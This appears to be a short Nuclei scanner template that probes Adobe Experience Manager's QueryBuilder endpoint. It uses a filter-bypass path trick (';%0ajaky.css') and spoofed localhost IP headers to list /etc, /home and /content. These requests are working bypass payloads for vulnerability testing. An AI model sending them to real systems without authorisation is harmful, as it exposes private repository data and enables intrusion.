id: Jaky_AEM

info:
  name: Jaky_AEM
  author: Jaky
  severity: high
  reference:
    - https://www.luomiweixiong.com/
  tags: Jaky_AEM

requests:
  - method: GET
    path:
      - "{{BaseURL}}/bin/querybuilder.json.;%0ajaky.css?path=/etc"
      - "{{BaseURL}}/bin/querybuilder.json.;%0Ajaky.css?path=/home"
      - "{{BaseURL}}/bin/querybuilder.json.;%0Ajaky.css?path=/content"


    headers:
      X-Client-IP: 127.0.0.1
      X-Remote-IP: 127.0.0.1
      X-Remote-Addr: 127.0.0.1
      X-Forwarded-For: 127.0.0.1
      X-Originating-IP: 127.0.0.1

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: regex
        part: body
        regex:
          - "success.*results"